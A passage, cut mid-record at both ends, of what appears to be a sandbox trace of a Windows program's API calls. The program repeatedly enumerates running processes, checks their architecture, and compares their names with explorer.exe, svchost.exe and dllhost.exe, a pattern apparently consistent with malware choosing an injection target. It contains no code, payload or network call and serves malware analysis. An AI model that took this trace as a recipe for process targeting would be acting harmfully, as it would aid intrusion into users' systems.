OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xec [0237.537] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0237.537] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0237.537] CloseHandle (hObject=0xec) returned 1 [0237.537] lstrcmpiA (lpString1="smith.exe", lpString2="explorer.exe") returned 1 [0237.537] lstrcmpiA (lpString1="smith.exe", lpString2="svchost.exe") returned -1 [0237.537] lstrcmpiA (lpString1="smith.exe", lpString2="dllhost.exe") returned 1 [0237.537] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0237.538] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xec [0237.538] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0237.538] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0237.538] CloseHandle (hObject=0xec) returned 1 [0237.538] lstrcmpiA (lpString1="spicedespite.exe", lpString2="explorer.exe") returned 1 [0237.538] lstrcmpiA (lpString1="spicedespite.exe", lpString2="svchost.exe") returned -1 [0237.538] lstrcmpiA (lpString1="spicedespite.exe", lpString2="dllhost.exe") returned 1 [0237.538] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0237.538] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xec [0237.538] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0237.538] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0237.539] CloseHandle (hObject=0xec) returned 1 [0237.539] lstrcmpiA (lpString1="wooden.exe", lpString2="explorer.exe") returned 1 [0237.539] lstrcmpiA (lpString1="wooden.exe", lpString2="svchost.exe") returned 1 [0237.539] lstrcmpiA (lpString1="wooden.exe", lpString2="dllhost.exe") returned 1 [0237.539] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0237.539] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xec [0237.539] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0237.539] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0237.539] CloseHandle (hObject=0xec) returned 1 [0237.539] lstrcmpiA (lpString1="dallasr.exe", lpString2="explorer.exe") returned -1 [0237.539] lstrcmpiA (lpString1="dallasr.exe", lpString2="svchost.exe") returned -1 [0237.539] lstrcmpiA (lpString1="dallasr.exe", lpString2="dllhost.exe") returned -1 [0237.539] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0237.540] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xec [0237.540] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0237.540] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0237.540] CloseHandle (hObject=0xec) returned 1 [0237.540] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="explorer.exe") returned -1 [0237.540] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="svchost.exe") returned -1 [0237.540] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="dllhost.exe") returned -1 [0237.540] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0237.540] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xec [0237.541] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0237.541] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0237.541] CloseHandle (hObject=0xec) returned 1 [0237.541] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="explorer.exe") returned -1 [0237.541] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="svchost.exe") returned -1 [0237.541] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="dllhost.exe") returned -1 [0237.541] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0237.541] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xec [0237.541] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0237.541] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0237.541] CloseHandle (hObject=0xec) returned 1 [0237.541] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="explorer.exe") returned 1 [0237.541] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="svchost.exe") returned -1 [0237.541] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="dllhost.exe") returned 1 [0237.541] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0237.542] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xec [0237.542] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0237.542] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0237.542] CloseHandle (hObject=0xec) returned 1 [0237.542] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="explorer.exe") returned -1 [0237.542] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="svchost.exe") returned -1 [0237.542] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="dllhost.exe") returned 1 [0237.542] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0237.543] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xec [0237.543] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0237.543] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0237.543] CloseHandle (hObject=0xec) returned 1 [0237.543] lstrcmpiA (lpString1="population openings.exe", lpString2="explorer.exe") returned 1 [0237.543] lstrcmpiA (lpString1="population openings.exe", lpString2="svchost.exe") returned -1 [0237.543] lstrcmpiA (lpString1="population openings.exe", lpString2="dllhost.exe") returned 1 [0237.543] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0237.543] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0237.543] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0237.544] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0237.544] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0237.544] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0237.544] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0237.545] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0237.545] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0237.545] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0237.545] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0237.546] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xec [0237.546] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0237.546] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0237.546] CloseHandle (hObject=0xec) returned 1 [0237.546] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0237.546] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xec [0237.546] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0237.546] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0237.546] CloseHandle (hObject=0xec) returned 1 [0237.546] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0237.547] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0237.547] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0237.547] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xec [0237.547] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0237.547] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0237.547] CloseHandle (hObject=0xec) returned 1 [0237.548] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0237.548] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0237.548] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xec [0237.548] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0237.548] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0237.548] CloseHandle (hObject=0xec) returned 1 [0237.548] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0237.549] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0237.549] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0xec [0237.549] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0237.549] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0237.549] CloseHandle (hObject=0xec) returned 1 [0237.549] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0237.574] CloseHandle (hObject=0xe8) returned 1 [0237.574] Sleep (dwMilliseconds=0x3e8) [0238.588] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0238.589] Process32First (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0238.590] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0238.590] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0238.590] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0238.590] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0238.591] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0238.591] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0238.591] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0238.591] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0238.592] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0238.592] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0238.592] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0238.592] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0238.593] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0238.593] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0238.593] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0238.593] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0238.594] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0238.594] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0238.594] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0238.594] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.595] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0238.595] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.595] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0238.595] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.596] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0238.596] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.596] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0238.596] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.597] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0238.597] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0238.597] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0238.597] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.598] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0238.598] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.598] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0238.598] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0238.599] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xec [0238.599] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0238.599] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0238.599] CloseHandle (hObject=0xec) returned 1 [0238.599] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0238.599] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0238.599] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0238.600] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xec [0238.600] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0238.600] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0238.600] CloseHandle (hObject=0xec) returned 1 [0238.600] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.600] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0238.600] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0238.601] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0238.601] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0238.601] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xec [0238.601] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0238.601] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0238.601] CloseHandle (hObject=0xec) returned 1 [0238.601] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="explorer.exe") returned -1 [0238.602] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="svchost.exe") returned -1 [0238.602] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="dllhost.exe") returned -1 [0238.602] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0238.602] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xec [0238.602] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0238.602] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0238.602] CloseHandle (hObject=0xec) returned 1 [0238.602] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="explorer.exe") returned -1 [0238.602] lstrcmpiA 